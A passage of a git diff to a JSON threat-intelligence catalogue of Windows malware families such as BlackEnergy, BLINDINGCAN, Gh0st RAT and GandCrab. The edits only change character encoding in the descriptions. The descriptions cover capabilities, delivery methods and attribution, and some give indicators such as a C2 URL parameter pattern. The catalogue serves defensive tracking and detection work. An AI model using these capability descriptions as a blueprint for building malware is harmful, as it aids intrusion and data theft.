bypass, DDoS attacks, clipboard monitoring, gaining unauthorized webcam access, credential theft, audio recording, XMRig coin mining and generic keylogging.", + "description": "According to Bitdefender, BitRAT is a notorious remote access trojan (RAT) marketed on underground cybercriminal web markets and forums. Its price tag of $20 for lifetime access makes it irresistible to cybercriminals and helps the malicious payload spread.\r\n\r\nFurthermore, each buyer’s modus operandi makes BitRAT even harder to stop, considering it can be employed in various operations, such as trojanized software, phishing and watering hole attacks.\r\n\r\nBitRAT’s popularity arises from its versatility. The malicious tool can perform a wide range of operations, including data exfiltration, UAC bypass, DDoS attacks, clipboard monitoring, gaining unauthorized webcam access, credential theft, audio recording, XMRig coin mining and generic keylogging.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bit_rat", @@ -16318,7 +16318,7 @@ "value": "BLACKCOFFEE" }, { - "description": "BlackEnergy, its first version shortened as BE1, started as a crimeware being sold in the Russian cyber underground as early as 2007. Initially, it was designed as a toolkit for creating botnets for conducting DDoS attacks. It supported a variety of flooding commands including protocols like ICMP, TCP SYN, UDP, HTTP and DNS. Among the high profile targets of cyber attacks utilising BE1 were a Norwegian bank and government websites in Georgia three weeks before Russo-Georgian War.\r\n\r\nVersion 2 of BlackEnergy, BE2, came in 2008 with a complete code rewrite that introduced a protective layer, a kernel-mode rootkit and a modular architecture. Plugins included mostly DDoS attacks, a spam plugin and two banking authentication plugins to steal from Russian nad Ukrainian banks. The banking plugin was paired with a module designed to destroy the filesystem. Moreover, BE2 was able to\r\n- download and execute a remote file;\r\n- execute a local file on the infected computer;\r\n- update the bot and its plugins;\r\n\r\nThe Industrial Control Systems Cyber Emergency Response Team issued an alert warning that BE2 was leveraging the human-machine interfaces of industrial control systems like GE CIMPLICITY, Advantech/Broadwin WebAccess, and Siemens WinCC to gain access to critical infrastructure networks.\r\n\r\nIn 2014, the BlackEnergy toolkit, BE3, switched to a lighter footprint with no kernel-mode driver component. Its plugins included:\r\n- operations with victim's filesystem\r\n- spreading with a parasitic infector\r\n- spying features like keylogging, screenshoots or a robust password stealer\r\n- Team viewer and a simple pseudo \u201cremote desktop\u201d\r\n- listing Windows accounts and scanning network \r\n- destroying the system\r\n\r\nTypical for distribution of BE3 was heavy use of spear-phishing emails containing Microsoft Word or Excel documents with a malicious VBA macro, Rich Text Format (RTF) documents embedding exploits or a PowerPoint presentation with zero-day exploit CVE-2014-4114.\r\n\r\nOn 23 December 2015, attackers behind the BlackEnergy malware successfully caused power outages for several hours in different regions of Ukraine. This cyber sabotage against three energy companies has been confirmed by the Ukrainian government. The power grid compromise has become known as the first-of-its-kind cyber warfare attack affecting civilians.", + "description": "BlackEnergy, its first version shortened as BE1, started as a crimeware being sold in the Russian cyber underground as early as 2007. Initially, it was designed as a toolkit for creating botnets for conducting DDoS attacks. It supported a variety of flooding commands including protocols like ICMP, TCP SYN, UDP, HTTP and DNS. Among the high profile targets of cyber attacks utilising BE1 were a Norwegian bank and government websites in Georgia three weeks before Russo-Georgian War.\r\n\r\nVersion 2 of BlackEnergy, BE2, came in 2008 with a complete code rewrite that introduced a protective layer, a kernel-mode rootkit and a modular architecture. Plugins included mostly DDoS attacks, a spam plugin and two banking authentication plugins to steal from Russian nad Ukrainian banks. The banking plugin was paired with a module designed to destroy the filesystem. Moreover, BE2 was able to\r\n- download and execute a remote file;\r\n- execute a local file on the infected computer;\r\n- update the bot and its plugins;\r\n\r\nThe Industrial Control Systems Cyber Emergency Response Team issued an alert warning that BE2 was leveraging the human-machine interfaces of industrial control systems like GE CIMPLICITY, Advantech/Broadwin WebAccess, and Siemens WinCC to gain access to critical infrastructure networks.\r\n\r\nIn 2014, the BlackEnergy toolkit, BE3, switched to a lighter footprint with no kernel-mode driver component. Its plugins included:\r\n- operations with victim's filesystem\r\n- spreading with a parasitic infector\r\n- spying features like keylogging, screenshoots or a robust password stealer\r\n- Team viewer and a simple pseudo “remote desktop”\r\n- listing Windows accounts and scanning network \r\n- destroying the system\r\n\r\nTypical for distribution of BE3 was heavy use of spear-phishing emails containing Microsoft Word or Excel documents with a malicious VBA macro, Rich Text Format (RTF) documents embedding exploits or a PowerPoint presentation with zero-day exploit CVE-2014-4114.\r\n\r\nOn 23 December 2015, attackers behind the BlackEnergy malware successfully caused power outages for several hours in different regions of Ukraine. This cyber sabotage against three energy companies has been confirmed by the Ukrainian government. The power grid compromise has become known as the first-of-its-kind cyber warfare attack affecting civilians.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy", @@ -16697,7 +16697,7 @@ "value": "BleachGap" }, { - "description": "BLINDINGCAN is a remote access trojan that communicates with its C&C server via HTTP(S).\r\nIt uses a (custom) RC4 or AES for encryption and decryption of its configuration and network traffic. \r\nIt sends information about the victim's environment, like computer name, IP, Windows product name and processor name.\r\nIt supports around 30 commands that include operations on the victim\u2019s filesystem, basic process management, command line execution, file exfiltration, configuration update, and the download and execution of additional payloads from the attackers' C&C. The commands are indexed by 16-bit integers, starting with the index 0x2009 and going incrementally up to 0x2057, with some indicis being skipped. \r\nIt uses various parameter names in its HTTP POST requests, mostly associated with web servers running bulletin board systems, like bbs, article, boardid, s_board, page, idx_num, etc.\r\nIt contains specific RTTI symbols like \".?AVCHTTP_Protocol@@\", \".?AVCFileRW@@\" or \".?AVCSinSocket@@\".\r\nBLINDINGCAN RAT is a flagship payload deployed in many Lazarus attacks, especially in the Operation DreamJob campaigns happening in 2020-2022.", + "description": "BLINDINGCAN is a remote access trojan that communicates with its C&C server via HTTP(S).\r\nIt uses a (custom) RC4 or AES for encryption and decryption of its configuration and network traffic. \r\nIt sends information about the victim's environment, like computer name, IP, Windows product name and processor name.\r\nIt supports around 30 commands that include operations on the victim’s filesystem, basic process management, command line execution, file exfiltration, configuration update, and the download and execution of additional payloads from the attackers' C&C. The commands are indexed by 16-bit integers, starting with the index 0x2009 and going incrementally up to 0x2057, with some indicis being skipped. \r\nIt uses various parameter names in its HTTP POST requests, mostly associated with web servers running bulletin board systems, like bbs, article, boardid, s_board, page, idx_num, etc.\r\nIt contains specific RTTI symbols like \".?AVCHTTP_Protocol@@\", \".?AVCFileRW@@\" or \".?AVCSinSocket@@\".\r\nBLINDINGCAN RAT is a flagship payload deployed in many Lazarus attacks, especially in the Operation DreamJob campaigns happening in 2020-2022.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blindingcan", @@ -16983,7 +16983,7 @@ "value": "Bolek" }, { - "description": "BookCodesRAT is a remote access trojan that uses HTTP(S) for communication. It supports around 25 commands that include operations on the victim\u2019s filesystem, basic process management and the download and execution of additional tools from the attacker\u2019s arsenal. They are indexed by 32-bit integers, starting with the value 0x97853646. \r\n\r\nBookCodesRAT uses mostly compromised South Korean web servers for the C&C traffic and is usually deployed against South Korean targets.", + "description": "BookCodesRAT is a remote access trojan that uses HTTP(S) for communication. It supports around 25 commands that include operations on the victim’s filesystem, basic process management and the download and execution of additional tools from the attacker’s arsenal. They are indexed by 32-bit integers, starting with the value 0x97853646. \r\n\r\nBookCodesRAT uses mostly compromised South Korean web servers for the C&C traffic and is usually deployed against South Korean targets.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bookcodesrat", @@ -17045,7 +17045,7 @@ "value": "BOOMBOX" }, { - "description": "FireEye describes BOOSTWRITE as a loader crafted to be launched via abuse of the DLL search order of applications which load the legitimate \u2018Dwrite.dll\u2019 provided by the Microsoft DirectX Typography Services. The application loads the \u2018gdi\u2019 library, which loads the \u2018gdiplus\u2019 library, which ultimately loads \u2018Dwrite\u2019. Mandiant identified instances where BOOSTWRITE was placed on the file system alongside the RDFClient binary to force the application to import DWriteCreateFactory from it rather than the legitimate DWrite.dll.", + "description": "FireEye describes BOOSTWRITE as a loader crafted to be launched via abuse of the DLL search order of applications which load the legitimate ‘Dwrite.dll’ provided by the Microsoft DirectX Typography Services. The application loads the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads ‘Dwrite’. Mandiant identified instances where BOOSTWRITE was placed on the file system alongside the RDFClient binary to force the application to import DWriteCreateFactory from it rather than the legitimate DWrite.dll.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.boostwrite", @@ -17160,7 +17160,7 @@ "value": "BRAIN" }, { - "description": "Brambul is a worm that spreads by using a list of hard-coded login credentials to launch a brute-force password attack against an SMB protocol for access to a victim\u2019s networks.", + "description": "Brambul is a worm that spreads by using a list of hard-coded login credentials to launch a brute-force password attack against an SMB protocol for access to a victim’s networks.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.brambul", @@ -17224,7 +17224,7 @@ "value": "BreachRAT" }, { - "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\\u0445\u043f-\u043f\u0440\u043e\u0431\u0438\u0432\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n", + "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\хп-пробив\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader" @@ -17923,7 +17923,7 @@ "value": "Carberp" }, { - "description": "Cardinal RAT is a remote access Trojan capable of stealing username and credentials, cleaning out cookies from browsers, keylogging and capturing screenshots on targeted systems. It is delivered via a downloader dubbed \u201cCarp\u201d which uses malicious macros in Microsoft Excel documents to compile embedded source code into an executable, which then deploys the Cardinal RAT malware family.", + "description": "Cardinal RAT is a remote access Trojan capable of stealing username and credentials, cleaning out cookies from browsers, keylogging and capturing screenshots on targeted systems. It is delivered via a downloader dubbed “Carp” which uses malicious macros in Microsoft Excel documents to compile embedded source code into an executable, which then deploys the Cardinal RAT malware family.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cardinal_rat", @@ -18226,7 +18226,7 @@ "value": "Chaos (Windows)" }, { - "description": "According to Kaspersky GReAT and AMR, TajMahal is a previously unknown and technically sophisticated APT framework discovered by Kaspersky Lab in the autumn of 2018. This full-blown spying framework consists of two packages named Tokyo and Yokohama. It includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents and cryptography key stealers, and even its own file indexer for the victim\u2019s machine. We discovered up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins they have ever seen for an APT toolset.", + "description": "According to Kaspersky GReAT and AMR, TajMahal is a previously unknown and technically sophisticated APT framework discovered by Kaspersky Lab in the autumn of 2018. This full-blown spying framework consists of two packages named Tokyo and Yokohama. It includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents and cryptography key stealers, and even its own file indexer for the victim’s machine. We discovered up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins they have ever seen for an APT toolset.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chaperone", @@ -20552,7 +20552,7 @@ "value": "CoViper" }, { - "description": "CozyDuke is not simply a malware toolset; rather, it is a modular malware platform formed around\r\na core backdoor component. This component can be instructed by the C&C server to download\r\nand execute arbitrary modules, and it is these modules that provide CozyDuke with its vast array\r\nof functionality. Known CozyDuke modules include:\r\n\u2022 Command execution module for executing arbitrary Windows Command Prompt commands\r\n\u2022 Password stealer module\r\n\u2022 NT LAN Manager (NTLM) hash stealer module\r\n\u2022 System information gathering module\r\n\u2022 Screenshot module", + "description": "CozyDuke is not simply a malware toolset; rather, it is a modular malware platform formed around\r\na core backdoor component. This component can be instructed by the C&C server to download\r\nand execute arbitrary modules, and it is these modules that provide CozyDuke with its vast array\r\nof functionality. Known CozyDuke modules include:\r\n• Command execution module for executing arbitrary Windows Command Prompt commands\r\n• Password stealer module\r\n• NT LAN Manager (NTLM) hash stealer module\r\n• System information gathering module\r\n• Screenshot module", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cozyduke", @@ -21392,7 +21392,7 @@ "value": "Cutwail" }, { - "description": "According to Subex Secure, CyberGate is a Remote Access Trojan (RAT) that allows an attacker to gain unauthorized access to\r\nthe victim\u2019s system. Attackers can remotely connect to the compromised system from anywhere\r\naround the world. The Malware author generally uses this program to steal private information\r\nlike passwords, files, etc. It might also be used to install malicious software on the compromised\r\nsystems.\r\n", + "description": "According to Subex Secure, CyberGate is a Remote Access Trojan (RAT) that allows an attacker to gain unauthorized access to\r\nthe victim’s system. Attackers can remotely connect to the compromised system from anywhere\r\naround the world. The Malware author generally uses this program to steal private information\r\nlike passwords, files, etc. It might also be used to install malicious software on the compromised\r\nsystems.\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cybergate", @@ -21539,7 +21539,7 @@ "value": "Dairy" }, { - "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on \u201cquality over quantity\u201d in email-based threats. DanaBot\u2019s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. ", + "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot", @@ -22037,7 +22037,7 @@ "value": "DarkTequila" }, { - "description": "DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks\u00ae Counter Threat Unit\u2122 (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver \"addon packages\" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.\r\n\r\nFrom January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.", + "description": "DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks® Counter Threat Unit™ (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver \"addon packages\" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.\r\n\r\nFrom January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla", @@ -22539,7 +22539,7 @@ "value": "Dented" }, { - "description": "According to ESET Research, DePriMon is a malicious downloader, with several stages and using many non-traditional techniques. To achieve persistence, the malware registers a new local port monitor \u2013 a trick falling under the \u201cPort Monitors\u201d technique in the MITRE ATT&CK knowledgebase. For that, the malware uses the \u201cWindows Default Print Monitor\u201d name; that\u2019s why we have named it DePriMon. Due to its complexity and modular architecture, researcher believe it to be a framework.\r\n\r\nDePriMon has been active since at least March 2017. DePriMon was detected in a private company, based in Central Europe, and at dozens of computers in the Middle East.", + "description": "According to ESET Research, DePriMon is a malicious downloader, with several stages and using many non-traditional techniques. To achieve persistence, the malware registers a new local port monitor – a trick falling under the “Port Monitors” technique in the MITRE ATT&CK knowledgebase. For that, the malware uses the “Windows Default Print Monitor” name; that’s why we have named it DePriMon. Due to its complexity and modular architecture, researcher believe it to be a framework.\r\n\r\nDePriMon has been active since at least March 2017. DePriMon was detected in a private company, based in Central Europe, and at dozens of computers in the Middle East.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deprimon", @@ -22593,7 +22593,7 @@ "value": "DeroHE" }, { - "description": " A DLL backdoor also reported publicly as \u201cDerusbi\u201d, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.", + "description": " A DLL backdoor also reported publicly as “Derusbi”, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi", @@ -23026,7 +23026,7 @@ "value": "DMSniff" }, { - "description": "DneSpy collects information, takes screenshots, and downloads and executes the latest version of other malicious components in the infected system. The malware is designed to receive a \u201cpolicy\u201d file in JSON format with all the commands to execute. The policy file sent by the C&C server can be changed and updated over time, making dneSpy flexible and well-designed. The output of each executed command is zipped, encrypted, and exfiltrated to the C&C server. These characteristics make dneSpy a fully functional espionage backdoor.", + "description": "DneSpy collects information, takes screenshots, and downloads and executes the latest version of other malicious components in the infected system. The malware is designed to receive a “policy” file in JSON format with all the commands to execute. The policy file sent by the C&C server can be changed and updated over time, making dneSpy flexible and well-designed. The output of each executed command is zipped, encrypted, and exfiltrated to the C&C server. These characteristics make dneSpy a fully functional espionage backdoor.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnespy", @@ -23904,7 +23904,7 @@ "value": "DuQu" }, { - "description": "In 2019, multiple destructive attacks were observed targeting entities within the Middle East. The National Cyber Security Centre (NCSC), a part of the National Cybersecurity Authority (NCA), detected a new malware named \"DUSTMAN\" that was detonated on December 29, 2019. Based on analyzed evidence and artifacts found on machines in a victim\u2019s network that were not wiped by the malware. NCSC assess that the threat actor behind the attack had some kind of urgency on executing the files on the date of the attack due to multiple OPSEC failures observed on the infected network. NCSC is calling the malware used in this attack \"DUSTMAN\" after the filename and string embedded in the malware. \"DUSTMAN\" can be considered as a new variant of \"ZeroCleare\" malware,\r\npublished in December 2019.", + "description": "In 2019, multiple destructive attacks were observed targeting entities within the Middle East. The National Cyber Security Centre (NCSC), a part of the National Cybersecurity Authority (NCA), detected a new malware named \"DUSTMAN\" that was detonated on December 29, 2019. Based on analyzed evidence and artifacts found on machines in a victim’s network that were not wiped by the malware. NCSC assess that the threat actor behind the attack had some kind of urgency on executing the files on the date of the attack due to multiple OPSEC failures observed on the infected network. NCSC is calling the malware used in this attack \"DUSTMAN\" after the filename and string embedded in the malware. \"DUSTMAN\" can be considered as a new variant of \"ZeroCleare\" malware,\r\npublished in December 2019.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dustman", @@ -24045,7 +24045,7 @@ "value": "EDA2" }, { - "description": "According to Heimdal, Egregor ransomware infection happens via a loader, then, in the victim\u2019s firewall, it enables the Remote Desktop Protocol. After this part, the malware is free to move inside the victim\u2019s network, identifying and disabling all the antivirus software it can find. The next step is the encryption of the data and the insertion of a ransom note named \u201cRECOVER-FILES.txt\u201d in all the compromised folders. ", + "description": "According to Heimdal, Egregor ransomware infection happens via a loader, then, in the victim’s firewall, it enables the Remote Desktop Protocol. After this part, the malware is free to move inside the victim’s network, identifying and disabling all the antivirus software it can find. The next step is the encryption of the data and the insertion of a ransom note named “RECOVER-FILES.txt” in all the compromised folders. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.egregor", @@ -24910,7 +24910,7 @@ "value": "EternalRocks" }, { - "description": "According to proofpoint, Bad Rabbit is a strain of ransomware that first appeared in 2017 and is a suspected variant of Petya. Like other strains of ransomware, Bad Rabbit virus infections lock up victims\u2019 computers, servers, or files preventing them from regaining access until a ransom\u2014usually in Bitcoin\u2014is paid.\r\n\r\n", + "description": "According to proofpoint, Bad Rabbit is a strain of ransomware that first appeared in 2017 and is a suspected variant of Petya. Like other strains of ransomware, Bad Rabbit virus infections lock up victims’ computers, servers, or files preventing them from regaining access until a ransom—usually in Bitcoin—is paid.\r\n\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternal_petya", @@ -25150,7 +25150,7 @@ "value": "EVILNUM (Windows)" }, { - "description": "A wiper used against in an attack against Iran\u2019s state broadcaster. Using campaign name coined by Check Point in lack of a better name for the wiper component.", + "description": "A wiper used against in an attack against Iran’s state broadcaster. Using campaign name coined by Check Point in lack of a better name for the wiper component.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilplayout", @@ -25685,7 +25685,7 @@ "value": "FFDroider" }, { - "description": "According to CyberArk, this malware is used to steal sensitive information, including login credentials, credit card information, cryptocurrency wallets and browser information from applications such as WinSCP, Discord, Google Chrome, Electrum, etc. It does all that by implementing a different approach than other stealers (we\u2019ll cover it later). Additionally, FickerStealer can function as a File Grabber and collect additional files from the compromised machine, and it can act as a Downloader to download and execute several second-stage malware.", + "description": "According to CyberArk, this malware is used to steal sensitive information, including login credentials, credit card information, cryptocurrency wallets and browser information from applications such as WinSCP, Discord, Google Chrome, Electrum, etc. It does all that by implementing a different approach than other stealers (we’ll cover it later). Additionally, FickerStealer can function as a File Grabber and collect additional files from the compromised machine, and it can act as a Downloader to download and execute several second-stage malware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fickerstealer", @@ -25936,7 +25936,7 @@ "value": "FiveHands" }, { - "description": "According to PICUS, Flagpro is malware that collects information from the victim and executes commands in the victim\u2019s environment. It targets Japan, Taiwan, and English-speaking countries. When a victim is infected with Flagpro malware, the malware can do the following:\r\n\r\nDownload and execute a tool\r\nExecute OS commands and send results\r\nCollect and send Windows authentication information", + "description": "According to PICUS, Flagpro is malware that collects information from the victim and executes commands in the victim’s environment. It targets Japan, Taiwan, and English-speaking countries. When a victim is infected with Flagpro malware, the malware can do the following:\r\n\r\nDownload and execute a tool\r\nExecute OS commands and send results\r\nCollect and send Windows authentication information", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flagpro", @@ -26508,7 +26508,7 @@ "value": "FusionDrive" }, { - "description": "FuwuqiDrama is a server-side RAT. It manages client connections by utilizing I/O completion ports, which are usually used in high-performance server applications as an elegant solution to manage many clients at once.\r\n\r\nIt contains two distinguishing hardcoded lists.\r\n\r\nFirst is a list of ~50 video files of South Korean TV series, having their titles translated to Mandarin Chinese, but encoded in the form of Pinyin romanization. That means the sounds are spelled in Latin alphabet without tone marks, for example meiyounihuobuxiaqu.avi represents Can't Live Without You (a K-drama from 2012) or wulalafufu.avi translates to Ohlala Couple (also from 2012). \r\n\r\nSecond is the list of the following corporations: NVIDIA, Amazon, Intel, Skype, 360Safe, Rising, Tencent, Mozilla, Adobe, Yahoo, Google. The same list is contained in some of the WannaCryptor samples.\r\n\r\nFuwuqiDrama stores its configuration in the INI file data\\package_con_x86.cat. It contains the port number and a bot identifier, all within a single section called Fuwuqi \u2013 the romanized Chinese word for server.\r\n", + "description": "FuwuqiDrama is a server-side RAT. It manages client connections by utilizing I/O completion ports, which are usually used in high-performance server applications as an elegant solution to manage many clients at once.\r\n\r\nIt contains two distinguishing hardcoded lists.\r\n\r\nFirst is a list of ~50 video files of South Korean TV series, having their titles translated to Mandarin Chinese, but encoded in the form of Pinyin romanization. That means the sounds are spelled in Latin alphabet without tone marks, for example meiyounihuobuxiaqu.avi represents Can't Live Without You (a K-drama from 2012) or wulalafufu.avi translates to Ohlala Couple (also from 2012). \r\n\r\nSecond is the list of the following corporations: NVIDIA, Amazon, Intel, Skype, 360Safe, Rising, Tencent, Mozilla, Adobe, Yahoo, Google. The same list is contained in some of the WannaCryptor samples.\r\n\r\nFuwuqiDrama stores its configuration in the INI file data\\package_con_x86.cat. It contains the port number and a bot identifier, all within a single section called Fuwuqi – the romanized Chinese word for server.\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fuwuqidrama", @@ -26645,7 +26645,7 @@ "value": "Gamotrol" }, { - "description": "GandCrab was a Ransomware-as-a-Service (RaaS) emerged in January 28, 2018, managed by a criminal organization known to be confident and vocal, while running a rapidly evolving ransomware campaign. Through their aggressive, albeit unusual, marketing strategies and constant recruitment of affiliates, they were able to globally distribute a high volume of their malware.\r\n\r\nIn a surprising announcement on May 31, 2019, the GandCrab\u2019s operators posted on a dark web forum, announced the end of a little more than a year of ransomware operations, citing staggering profit figures. However, If there\u2019s one thing that sets these threat actors apart from other groups, it is that they are unpredictable; so there is always the possibility that they might re-surface in one form or another.", + "description": "GandCrab was a Ransomware-as-a-Service (RaaS) emerged in January 28, 2018, managed by a criminal organization known to be confident and vocal, while running a rapidly evolving ransomware campaign. Through their aggressive, albeit unusual, marketing strategies and constant recruitment of affiliates, they were able to globally distribute a high volume of their malware.\r\n\r\nIn a surprising announcement on May 31, 2019, the GandCrab’s operators posted on a dark web forum, announced the end of a little more than a year of ransomware operations, citing staggering profit figures. However, If there’s one thing that sets these threat actors apart from other groups, it is that they are unpredictable; so there is always the possibility that they might re-surface in one form or another.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab", @@ -27074,7 +27074,7 @@ "value": "GhostAdmin" }, { - "description": "According to Security Ninja, Gh0st RAT (Remote Access Terminal) is a trojan \u201cRemote Access Tool\u201d used on Windows platforms, and has been used to hack into some of the most sensitive computer networks on Earth.\r\n\r\nBelow is a list of Gh0st RAT capabilities.\r\nTake full control of the remote screen on the infected bot.\r\nProvide real time as well as offline keystroke logging.\r\nProvide live feed of webcam, microphone of infected host.\r\nDownload remote binaries on the infected remote host.\r\nTake control of remote shutdown and reboot of host.\r\nDisable infected computer remote pointer and keyboard input.\r\nEnter into shell of remote infected host with full control.\r\nProvide a list of all the active processes.\r\nClear all existing SSDT of all existing hooks.", + "description": "According to Security Ninja, Gh0st RAT (Remote Access Terminal) is a trojan “Remote Access Tool” used on Windows platforms, and has been used to hack into some of the most sensitive computer networks on Earth.\r\n\r\nBelow is a list of Gh0st RAT capabilities.\r\nTake full control of the remote screen on the infected bot.\r\nProvide real time as well as offline keystroke logging.\r\nProvide live feed of webcam, microphone of infected host.\r\nDownload remote binaries on the infected remote host.\r\nTake control of remote shutdown and reboot of host.\r\nDisable infected computer remote pointer and keyboard input.\r\nEnter into shell of remote infected host with full control.\r\nProvide a list of all the active processes.\r\nClear all existing SSDT of all existing hooks.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat", @@ -27534,7 +27534,7 @@ "value": "GoldenHelper" }, { - "description": "According securityweek, GoldenSpy, the malware was observed as part of a campaign that supposedly started in April 2020, but some of the identified samples suggest the threat has been around since at least December 2016.\r\n\r\nOne of the compromised organizations, a global technology vendor that conducts government business in the US, Australia and UK, and which recently opened offices in China, became infected after installing \u201cIntelligent Tax,\u201d a piece of software from the Golden Tax Department of Aisino Corporation, which a local bank required for paying local taxes.\r\n\r\nAlthough it worked as advertised, the software was found to install a hidden backdoor to provide remote operators with the possibility to execute Windows commands or upload and run files.", + "description": "According securityweek, GoldenSpy, the malware was observed as part of a campaign that supposedly started in April 2020, but some of the identified samples suggest the threat has been around since at least December 2016.\r\n\r\nOne of the compromised organizations, a global technology vendor that conducts government business in the US, Australia and UK, and which recently opened offices in China, became infected after installing “Intelligent Tax,” a piece of software from the Golden Tax Department of Aisino Corporation, which a local bank required for paying local taxes.\r\n\r\nAlthough it worked as advertised, the software was found to install a hidden backdoor to provide remote operators with the possibility to execute Windows commands or upload and run files.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldenspy", @@ -27579,7 +27579,7 @@ "value": "GoldMax" }, { - "description": "GoldDragon was a second-stage backdoor which established a permanent presence on the victim\u2019s system once the first-stage, file-less, PowerShell-based attack leveraging steganography was executed. The initial attack was observed first in December 2017, when a Korean-language spear phishing campaing targeted organizations linked with Pyeongchang Winter Olympics 2018. GoldDragon was delivered once the attacker had gained an initial foothold in the targeted environment.\r\n\r\nThe malware was capable of a basic reconnaissance, data exfiltration and downloading of additional components from its C&C server. ", + "description": "GoldDragon was a second-stage backdoor which established a permanent presence on the victim’s system once the first-stage, file-less, PowerShell-based attack leveraging steganography was executed. The initial attack was observed first in December 2017, when a Korean-language spear phishing campaing targeted 